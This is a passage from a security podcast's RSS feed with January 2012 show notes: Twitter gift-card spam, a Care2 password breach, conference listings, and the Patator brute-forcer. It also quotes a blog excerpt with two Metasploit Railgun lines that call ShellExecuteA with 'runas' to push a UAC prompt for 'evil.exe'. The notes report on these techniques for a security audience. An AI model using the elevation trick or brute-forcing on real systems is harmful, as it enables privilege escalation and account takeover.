	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Trend recently found </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> spam touting &ldquo;gift cards&rdquo; at the tail-end of the gift-giving season. In this run, </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> users are lured into clicking a shortened URL with the strings &ldquo;#mcdonalds gift card.&rdquo; McDonald&rsquo;s is a globally well-known fast food chain that, like many other establishments, do offer certificates and vouchers for patrons who would like to give these as gifts or rewards.</span><img height="409px;" src="https://lh3.googleusercontent.com/dJG1Ur2nRAAhX-12cwC0deMnB8YSmaGCAm1PynD4muCsJzApCt38W8aHutHr2Ku-v1FWM9GqJimJmpCbFtX_FmweMdsY755ieqadE9pDi8SwRcHqOAg" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately, closer inspection of the shortened link reveals a URL that doesn&rsquo;t seem to have anything to do with McDonald&rsquo;s gift certificates.</span><img height="118px;" src="https://lh6.googleusercontent.com/rYgdc4zPwQngLx8X-K4nL_LrUsOFgST2-8lQwAMZdqr_px8qB2J6nydqpZKMDvOl80gnI15KLlNMtcysGsIb5896QcJ248kKyWMDZzRYjAPjo-kmKwQ" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead, the link leads to the following site:</span><img height="330px;" src="https://lh3.googleusercontent.com/VE7M0eROrtiDPF73oVPZyWA2dQwLvYv_UFWIRS_H0SGhaJ7WdRRlfPJ86i1Dp0I3KnoftAh3EfVj5movqEyJAa-vWO-HOUl6sWa0f0TZnEtFeOznfgk" width="430px;" /><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Clicking the &ldquo;Join Now&rdquo; button leads to some redirections that finally lands the page to an adult dating site. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We consider the URLs used in this attack as malicious because of the deceitful nature by which they are used. The lure &ldquo;#mcdonald&rsquo;s gift card&rdquo; would have definitely led several users to believe that some gift certificates or vouchers are being given away or discounted.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A couple of weeks ago of weeks ago in the US, attention was drawn to</span><a href="http://www.huffingtonpost.com/2011/12/20/mcdonalds-mystery-santa_n_1161278.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">a Mystery Santa</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> who donated $500 worth of gift cards from McDonald&rsquo;s to a nearby homeless shelter. Whether or not cybercriminals got a social engineering idea from this cannot be confirmed, but in all cases users are advised against clicking on links without first inspecting them. In this case, hovering on the link would have given users a clue about how to proceed. Another context clue in the illegitimacy of this spam is how users may find themselves being mentioned in the same tweet with unfamiliar users or users that they do not normally follow. This is due to how the spam bot mentions </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> accounts that have been victimized in the same spammed tweet.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IF TIME: them mubix blog regarding UAC elevation</span><br />
	<a href="http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A number of times during tests I&#39;ve actually run into those mythical creatures called &quot;patched windows machines&quot;. At</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DerbyCon</span></a><a href="http://twitter.com/carnal0wnage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Chris Gates</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and I released the &quot;Ask&quot; post module (which I had failed to publish). This module very simply uses the</span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153%28v=vs.85%29.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ShellExecute windows function</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> via</span><a href="http://dev.metasploit.com/redmine/projects/framework/wiki/RailgunUsage"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Railgun</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with the undocumented (but very well known) operator of &#39;runas&#39;.</span></p>
<p>	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">client.railgun.add_function( &#39;shell32&#39;, &#39;ShellExecuteA&#39;, &#39;DWORD&#39;,[[&quot;DWORD&quot;,&quot;hwnd&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpOperation&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpFile&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpParameters&quot;,&quot;in&quot;],[&quot;PCHAR&quot;,&quot;lpDirectory&quot;,&quot;in&quot;],[&quot;DWORD&quot;,&quot;nShowCmd&quot;,&quot;in&quot;],])<br class="kix-line-break" /><br />
	</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">client.railgun.shell32.ShellExecuteA(nil,&quot;runas&quot;,&quot;evil.exe&quot;,nil,nil,5)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This would quite simply prompt the user with that annoying UAC prompt asking the user to run &#39;</span><span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">evil.exe</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#39; with Administrative privs. If they are not &quot;Admins&quot; themselves then it would prompt them for the user name and password. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3326/0/infosec-daily-podcast-episode-558.mp3" length="19949545" type="audio/mpeg" />
		<itunes:duration>0:41:31</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.care2.com/care2blog/to-all-care2-members-security-breach.html
The website of Care2, an organization that&#8217;s all about living a healthy, green lifestyle, has been breached in the last days of December by an unknown hacker team that managed to access the login information belonging to a number of the site&#8217;s members.
	The official statement released by the company claims that only a limited number of Care2 member accounts were accessed by the cybercriminals, but as a precaution measure, all their 17,911,623 account holders are forced to change their passwords on their next log-in.
	&#8220;We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,&#8221; Care2 representatives wrote on the site&#8217;s blog.
	The vulnerabilities which the hackers used to penetrate the site&#8217;s defenses were immediately patched up to prevent further access, but the incident is still being investigated to determine the full extent of the breach.
	The FBI has been contacted to investigate the matter, but so far, the only clues to point to the identity of the attackers are some IP addresses from Russia. This, however, doesn&#8217;t necessarily prove that the attack was launched from there. It could be that the hackers compromised devices from this certain location.
	Since no financial information is stored in the site&#8217;s databases, the hackers may have targeted Care2 in order to obtain passwords which they can later use to gain access to other accounts, including ones that contain [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 557 &#8211; Resolutions, Patator, DiY Satellites, ZoneTransfer.me, Censorship &amp; Porn Wiki</title>
		<link>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki</link>
		<comments>http://www.isdpodcast.com/episode-557-resolutions-patator-diy-satellites-zonetransfer-me-censorship-porn-wiki#comments</comments>
		<pubDate>Tue, 03 Jan 2012 01:57:03 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3320</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 557 for January 2, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 557 for January 2, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What are the InfoSec Daily Podcast members New Years Resolutions?</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://patator.googlecode.com/files/patator_v0.3.py"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://patator.googlecode.com/files/patator_v0.3.py</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They either do not work or are not reliable (false negatives several times in the past)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They lack very useful features that are easy to code in python (eg. interactive runtime)</span></li>
</ul>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Not write the same code over and over</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Run multi-threaded</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Benefit for useful features such as the interactive runtime commands, response logging, etc.</span></li>
</ul>
<p>
